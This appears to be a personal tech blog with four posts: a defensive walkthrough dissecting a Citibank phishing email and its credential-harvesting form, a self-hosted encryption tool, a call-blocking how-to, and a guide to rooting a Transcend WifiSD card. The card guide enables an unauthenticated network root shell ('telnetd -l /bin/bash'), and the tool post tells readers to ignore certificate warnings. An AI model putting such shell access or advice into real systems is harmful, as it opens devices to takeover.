How to spot phishing attempt – anatomy of a ‘phishing’ Email

If you consider yourself as someone who knows how to spot spam and phishing emails, you won’t learn anything new here. Others who want to learn how to spot spam or phishing mails, especially if you are someone who simply can’t resist clicking on links in your email no matter how many times you were told not to :)  read on …

Like most of you, every now and then I do get a phishing mail delivered to my inbox. Gmail usually does a pretty good job of filtering spam and phishing mails, however, this particular one shown here slipped through gmail spam filter because of my own filter (a discussion on why it slipped is outside the scope of this blog). Anyway, here is a screenshot of the phishing mail we will be dissecting in this blog. Apparently, citibank all of a sudden lost everything they know about me except my email address :). You can stop right here since it is clearly a phishing attempt, but for the purpose of this exercise, lets continue. At a glance, for a novice email user, it looks legitimate and it does appear to have come from citibank.com, and is instructing me to download the attachment called Citibank.html. It must be important since it is from citibank alert service and I should immediately download the file and double click it right? The first thing you need to understand is that the ‘mail from’ (i.e. in this case alerts@citibank.com) is the easiest thing to fake. To find out where it really came from you need to see the full email headers from the “show original” option. [Note: The screen shot below is from gmail but as far as I know all mail clients like yahoo, hotmail, outlook etc allow you to view the 'raw' content of the mail which will show all mail headers].

When you select the ‘show original’ as shown above, you can get the ‘raw’ mail content including all the mail headers (see annotated screenshot below).

From the above screenshot, you can clearly see google’s mail server received this mail from decisiontreetech.com not from citibank.com (highlighted in yellow). Does this mean the decisiontreetech.com is the phishing source? The answer is No. In this case, it looks like someone from that company seem to be infected with a malware allowing a remote hacker to hijack their email account session to send phishing mail via that company’s mail server. If you look further down you can see a remote host from France with a IP address 62.244.93.88 initiated this message. For many of you, unless you are in cyber crime division of law enforcement, at this point, it doesn’t matter who the criminal is (we will discover shortly below), you know this is fake and you should simply delete this mail and go on with your life. You can continue to read if you are interested in dissecting this mail further …

Now, we are going to examine the attachment the crook wants you to download so he can collect your information. Typically, you can view the raw mail safely with your browser to see what the attachment contains to make sense out of it as long as its not binary. In this case it is supposed to be a HTML file. However, the crook encoded the content of the HTML text to base64 encoding so it is not easy to view what he is trying to do and where he intend to send your information (see the screen shot below).

I can just download the file to let the browser decode the base64 encoded HTML for me or just simply copy the content and decode it myself. The following screen shot is a relevant part of the HTML file decoded using an online decode tool from http://www.base64decode.org
Finally, you can see they are posting your information to a webserver at 69.73.182.242 to eventually mail everything to two email address i.e. sammy78@iname.com and effeferegregregre@yahoo.com There you have it.
PS: As of this writing the above server is still up and running although the post action is no longer working.
Hope this blog helped you to learn how to easily spot phishing mails and protect your hard earned money. Bottom-line is, if you get a mail asking for stuff your financial institution should already know, its a fake, delete it.

Access your passwords anywhere

Have you ever forgotten the password to login to one of your many online accounts? It happens to me all the time so I save all my passwords to a file, encrypt it, and have a shell script to decrypt, search and spit the plain password whenever I don’t remember the password. This is great when I am at home where I have access to my script and my encrypted password file. However, if I don’t remember a password to a site when I am not at home, it is a problem. So I exposed a simple public interface on my webserver to securely decrypt my passwords online from anywhere. Feel free to use this tool to encrypt/decrypt anything (passwords, email, or just any text) and share a per message passphrase to other person to decrypt the message to its original content. Don’t worry no one will be able to read unless you give them your passphrase. You can save the encrypted content (see a sample below) anywhere like google docs, dropbox, skydrive, or usb stick etc so you can easily access it anywhere. Feel free to use the tool (it is at the link below). There are many password manager tools like lastpass, keeppass etc available freely that does similar things but the only difference is, here you control how you safegaurd your encrypted file and in addition, you have simple web access to encrypt/decrypt any arbitrary text.

encdec tool: https://selvans.net/encdec/
NOTE: my webserver uses a self signed SSL certificate so your browser will complain which you have to ignore.

It is perfectly safe to store the encrypted message anywhere as it will be encrypted with strong AES-256 cipher. When ever you need to see the message content, all you need to remember is the passphrase you used to encrypt it. To get an idea, decrypt the sample content below using the passphrase ‘th1s 1s coo1′ without the quotes if you are interested to see how it works.

b97ca8a4928db1a7M5lbEofsXXYqTrvEQXyIYBwbJgqUo8S5iUZuzUuoX370OzoeIXiEbkX1KKprK02Z7n9ocnMx1JoEeB3cJdgqBxkpO84Pq+rQrSsUcgLtOp10xZnFM40EJX9RPyLD7Gyl1yKIzZ5nuWxrKIz29R5UFel6J6ZBGKCbWRP2lVbaQPKFZLJtgUQ7Vq7sKxffUOepPoBxeCWcpNYyhthj4IQ/t1WUl8asGSH7CUp0Rje3GJIaHBSciwUDA+g4euunb4NY6Kivq3O7FCyJ8REpZgZ9TIZuUgYFV0tjMi9xdAxWR4EUsJUaG4fC+5JfFA05cGZgcEkwc9VSdLKDc6L1p3Ku3L/3dRnBSlSC1hXZM0Shsdo=

HOWTO block unwanted calls using Vonage and Google Voice

While most VoIP based telephone service providers allow features to block annoying telemarketers and SPAM calls, Vonage does not provide any feature to block calls but I still stick to Vonage for number of other features I really like. The following are 3 simple and easy steps to setup selective call blocking using combination of Vonage and Google Voice service. Not an elegant solution, but it does work, most importantly, its free :) I am using successfully for couple of years now.

Just follow the 3 steps below.

1. Get a free google voice number. Go to https://www.google.com/voice and follow the prompt to set it up with your home or cell (you should remove it later) and google chat as the forwarding numbers as shown below …

Phones setting: http://selvans.net/vonage_scb/gvsettings.png
Calls setting: http://selvans.net/vonage_scb/gvcallsettings.png
Note: mine shows only google chat since I removed all forwarding numbers.

2. Login to your vonage account and setup simulring to ring your google voice as shown below
Simulring: http://selvans.net/vonage_scb/simulring.png

3. Login to your vonage account and setup voicemail timeout settings as shown below
Vonage VM timeout: http://selvans.net/vonage_scb/vmtimeout.png

After this, when ever you get an unwanted call, login to google voice, select history, find the unwanted number and select “block” from the pulldown menu under “more” as shown below …
http://selvans.net/vonage_scb/gvblock.png

Note: Google does a pretty good job on its own blocking spam… as you can see, I did not have to block this 702-815-2394 number since google already did that for me :)

In addition, if you have a list of numbers to be blocked you can follow my original post below to setup a group of numbers to block.

https://forums.vonage.com/showpost.php?p=17184&postcount=56

Enjoy!

HOWTO setup keybased ssh, scp to Transend WifiSD card

The following are steps to get root and ssh access to Transend WifiSD card to automate copying of files from the card. It is assumed that the user is familiar with some knowledge of Linux scripts and commands. It is also assumed that the user is going to use a Linux host to interact with the card although the setup can be easily used in Windows as well using tools like winSCP or cygwin or pscp.exe.

The setup outlined here is based on the information and code shared by the original author (Glen) at the following link/blog.
https://www.pitt-pladdy.com/blog/_20140202-083815_0000_Transcend_WiFi_SD_Hacks_CF_adaptor_telnet_custom_upload_/

DISCLAIMER: Use it at your own risk. I am not responsible for any loss or damage to your property.

STEPS:

0. Use the Transcend tools (andriod app or ios app) to configure your card to connect to your home wifi network; while you are at it, change admin user, cards wifi ssid, passwd etc. Make sure your card successfully connects to your  wireless network and note the IP address assigned to it by your home wifi router.

1. Download and extract http://selvans.net/public/custom.tar.gz in your desktop computer and edit the autorun.sh file to uncomment the line below for telnet access, i.e. remove ‘#’

   telnetd -l /bin/bash &

2. Edit the access.sh file and change “trusted_network” variable to match yours

   trusted_network=”your_routers_ssid:your_routers_ip:your_router_mac”
   example: trusted_network=”myrouterssid:192.168.1.1:ff:ff:ff:ff:ff:ff”
 
3. Insert your SD card in your computer and copy the entire custom/ directory from step #1 above to the root directory of SD card. In addition, also copy autorun.sh to root directory of SD card.

4. Remove card and reinsert it into your computer.

5. Now you should be able to telnet to your card from your linux box, i.e. telnet
In the examples shown below 192.168.xxx.xxx is my WifiSD card  and 192.168.yyy.yyy is my ubuntu desktop

   arul@cheetah:~$ telnet 192.168.xxx.xxx
   Trying 192.168.xxx.xxx…
   Connected to 192.168.xxx.xxx.
   Escape character is ‘^]’.
   # ls
   bin             home            lost+found      sbin            usr
   config_value    init            mnt             sys             var
   dev             lib             proc            tmp             www
   etc             linuxrc         root            ts_version.inc

6. Once you are logged in via telnet as shown at #5 above, you need to create dropbear hostkeys and copy them to your desktop to include in /custom directory on SDcard.  Note: I have included two dummy files in /custom directory you need to replace them by creating your own key files. i.e. follow the example below but use your IP address and your user name of course.
 
   # dropbearkey -t rsa -f /tmp/dropbear_rsa_host_key
   # dropbearkey -t dss -f /tmp/dropbear_dss_host_key
   # scp /tmp/dropbear_* arul@192.168.yyy.yyy:/tmp/.
 
Now, copy the 2 files from your /tmp directory to the custom/ directory on the SD card  by replacing them.

7. Create (or copy if you already have a dsa public key) in your desktop to  the /custom directory as authorized_keys. Note: I have a dummy authorized_keys  file that you need to replace.

   ssh-keygen -t dsa
   cp ~/.ssh/id_dsa.pub custom/authorized_keys

8. Once you update all the key files in custom/ directory in the card, unplug your card and plug it back into your device (computer or camera) one last time. Once the card boots, you should be able to ssh into your card or scp files, or setup automated scripts to copy files from card to your desktop… and pretty much do everything you can do with ssh!
 
   example: 
   arul@cheetah:/tmp$ ssh root@192.168.xxx.xxx
   # cat /proc/cpuinfo 
   Processor : ARM926EJ-S rev 5 (v5l)
   BogoMIPS : 421.06
   Features : swp half fastmult edsp java 
   CPU implementer : 0x41
   CPU architecture: 5TEJ
   CPU variant : 0x0
   CPU part : 0x926
   CPU revision : 5

   Hardware : KeyASIC Ka2000 EVM
   Revision : 0000
   Serial : 0000000000000000
   
   # date
   Sat May  3 16:13:53 UTC 2014
   
   # /sbin/busybox-armv5l uname -a

   Linux (none) 2.6.32.28 #137 PREEMPT Fri Mar 22 18:21:52 CST 2013 armv5tejl GNU/Linux

   # exit
   Connection to 192.168.xxx.xxx closed.

   arul@cheetah:/tmp$ scp -r root@192.168.xxx.xxx:/mnt/sd/DCIM/* .
   DSCN0254.JPG                                          100%  836KB 278.8KB/s   00:03 

Have fun with ssh/scp on your Transend WifiSD card!

TOOLS:
   This is where I got the prebuilt busybox and dropbear binaries for reference. They are already in the custom/ directory for convenience.
   arm5l busybox: http://busybox.net/downloads/binaries/latest/
   arm5l dropbear: http://landley.net/aboriginal/about.html